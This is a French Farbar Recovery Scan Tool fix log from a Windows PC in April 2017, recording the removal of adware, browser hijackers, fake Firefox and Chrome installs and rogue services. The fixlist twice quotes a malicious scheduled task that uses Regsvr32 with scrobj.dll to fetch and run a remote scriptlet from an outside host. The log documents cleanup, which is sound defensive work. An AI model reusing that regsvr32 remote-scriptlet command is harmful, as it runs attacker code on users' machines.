Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 19-04-2017
Exécuté par Tamara (20-04-2017 18:07:36) Run:1
Exécuté depuis C:\Users\Tamara\Desktop
Profils chargés: Tamara (Profils disponibles: Tamara)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorepoint:
CloseProcesses:
zip: C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe;C:\Users\Tamara\AppData\Local\3DM\Kitty.dll;C:\Users\Tamara\AppData\Roaming\sp_data.sys 
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Task: {8493501E-26A9-4826-8CA7-21145D220A7D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj84FjlWN8YxFTq3MjZYRjwcMkJXRWJYOYE8MWEyNTI4Mq== scrobj.dll
Task: {1C1CB4F1-2CF0-4F89-87D2-7F8A287AF24D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {5890D6BA-F4F3-4788-A815-1594E0042527} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {63FF4EB2-4EEA-4855-B991-4A57CF7DDA9F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {8493501E-26A9-4826-8CA7-21145D220A7D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj84FjlWN8YxFTq3MjZYRjwcMkJXRWJYOYE8MWEyNTI4Mq== scrobj.dll
Task: {CE3E3A73-1FB1-46F0-ABD4-910242C8DC0F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {D2B19E7C-A0A3-477D-B453-837BDDAE4B2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
FirewallRules: [{D2D3940A-D8A5-4636-882E-D6631A096519}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
CHR StartupUrls: Default -> "www.google.fr","hxxp://start.mysearchdial.com/?f=1&a=tele0101&cd=2XzuyEtN2Y1L1Qzu0DyE0Czy0E0FyCyD0EtC0AzyyE0E0DyCtN0D0Tzu0CyByEyBtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=250776320&ir=","hxxp://start.mysearchdial.com/?f=1&a=tele0103&cd=2XzuyEtN2Y1L1Qzu0DyE0Czy0E0FyCyD0EtC0AzyyE0E0DyCtN0D0Tzu0CyByCyDtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=1801415498&ir="
HKU\S-1-5-21-3314119890-3188422628-2415028650-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) <==== ATTENTION
S2 3DM; C:\Users\Tamara\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] () [Fichier non signé]
2017-04-19 14:03 - 2017-04-19 14:03 - 00002075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-19 14:03 - 2017-04-19 14:03 - 00000000 ____D C:\Users\Tamara\AppData\Roaming\Firefox
2017-04-19 14:03 - 2017-04-19 14:03 - 00000000 ____D C:\Users\Tamara\AppData\Local\Firefox
2017-04-19 14:02 - 2017-04-19 14:03 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-19 14:03 - 2017-04-19 14:03 - 00000000 ____D C:\Users\Tamara\AppData\Local\Dohat
2017-04-19 14:02 - 2017-04-19 14:02 - 00000000 ____D C:\Program Files (x86)\Dohat
2017-04-19 13:57 - 2017-04-19 14:02 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-19 14:02 - 2017-04-19 14:02 - 00000000 ____D C:\Users\Tamara\AppData\Local\3DM
2015-04-11 06:36 - 2012-09-07 13:40 - 0000256 _____ () C:\ProgramData\SetStretch.cmd
2015-04-11 06:36 - 2009-07-22 12:04 - 0024576 _____ () C:\ProgramData\SetStretch.exe
2015-04-11 06:36 - 2012-09-07 13:37 - 0000103 _____ () C:\ProgramData\SetStretch.VBS
unlock: C:\Users\Tamara\AppData\Roaming\sp_data.sys
C:\Users\Tamara\AppData\Roaming\sp_data.sys
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
C:\Program Files (x86)\ScreenShot
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot
C:\Users\Tamara\AppData\Roaming\ScreenShot
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [347200 2015-02-09] (WildTangent)
S3 GamesAppService; C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [265808 2014-12-17] (WildTangent, Inc.)
C:\Program Files (x86)\WildTangent Games\
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
removeproxy:
emptytemp:

*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
================== Zip: ===================
"C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" -> non trouvé(e)
C:\Users\Tamara\AppData\Local\3DM\Kitty.dll -> copié(e) avec succès vers C:\Users\Tamara\Desktop\20.04.2017_18.08.39.zip
C:\Users\Tamara\AppData\Roaming\sp_data.sys -> copié(e) avec succès vers C:\Users\Tamara\Desktop\20.04.2017_18.08.39.zip
=========== Zip: Fin ===========
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App\\SystemComponent => valeur supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8493501E-26A9-4826-8CA7-21145D220A7D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8493501E-26A9-4826-8CA7-21145D220A7D} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C1CB4F1-2CF0-4F89-87D2-7F8A287AF24D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C1CB4F1-2CF0-4F89-87D2-7F8A287AF24D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5890D6BA-F4F3-4788-A815-1594E0042527} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5890D6BA-F4F3-4788-A815-1594E0042527} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{63FF4EB2-4EEA-4855-B991-4A57CF7DDA9F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63FF4EB2-4EEA-4855-B991-4A57CF7DDA9F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8493501E-26A9-4826-8CA7-21145D220A7D} => clé non trouvé(e). 
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => clé non trouvé(e). 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CE3E3A73-1FB1-46F0-ABD4-910242C8DC0F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CE3E3A73-1FB1-46F0-ABD4-910242C8DC0F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D2B19E7C-A0A3-477D-B453-837BDDAE4B2F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D2B19E7C-A0A3-477D-B453-837BDDAE4B2F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D2D3940A-D8A5-4636-882E-D6631A096519} => valeur supprimé(es) avec succès
Chrome StartupUrls => supprimé(es) avec succès
HKU\S-1-5-21-3314119890-3188422628-2415028650-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => clé supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\3DM => clé supprimé(es) avec succès
3DM => service supprimé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => déplacé(es) avec succès
C:\Users\Tamara\AppData\Roaming\Firefox => déplacé(es) avec succès
C:\Users\Tamara\AppData\Local\Firefox => déplacé(es) avec succès
C:\Program Files (x86)\Firefox => déplacé(es) avec succès
C:\Users\Tamara\AppData\Local\Dohat => déplacé(es) avec succès
C:\Program Files (x86)\Dohat => déplacé(es) avec succès
C:\Program Files (x86)\BiaoJi => déplacé(es) avec succès
C:\Users\Tamara\AppData\Local\3DM => déplacé(es) avec succès
C:\ProgramData\SetStretch.cmd => déplacé(es) avec succès
C:\ProgramData\SetStretch.exe => déplacé(es) avec succès
C:\ProgramData\SetStretch.VBS => déplacé(es) avec succès
"C:\Users\Tamara\AppData\Roaming\sp_data.sys" => a été déverrouillé
C:\Users\Tamara\AppData\Roaming\sp_data.sys => déplacé(es) avec succès
HKLM\System\CurrentControlSet\Services\SSSvc => clé supprimé(es) avec succès
SSSvc => service supprimé(es) avec succès
C:\Program Files (x86)\ScreenShot => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot => déplacé(es) avec succès
C:\Users\Tamara\AppData\Roaming\ScreenShot => déplacé(es) avec succès
HKLM\System\CurrentControlSet\Services\GamesAppIntegrationService => clé supprimé(es) avec succès
GamesAppIntegrationService => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\GamesAppService => clé supprimé(es) avec succès
GamesAppService => service supprimé(es) avec succès
C:\Program Files (x86)\WildTangent Games => déplacé(es) avec succès

========= ipconfig /flushdns =========


Configuration IP de Windows

Cache de r‚solution DNS vid‚.

========= Fin de CMD: =========


========= netsh advfirewall reset =========

Ok.


========= Fin de CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-3314119890-3188422628-2415028650-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-3314119890-3188422628-2415028650-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 35547588 B
Java, Flash, Steam htmlcache => 2406 B
Windows/system/drivers => 124872426 B
Edge => 9212753 B
Chrome => 835877453 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 762193 B
systemprofile32 => 0 B
LocalService => 351602 B
NetworkService => 49878 B
Tamara => 1861444545 B

RecycleBin => 12451811 B
EmptyTemp: => 2.7 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 18:15:47 ====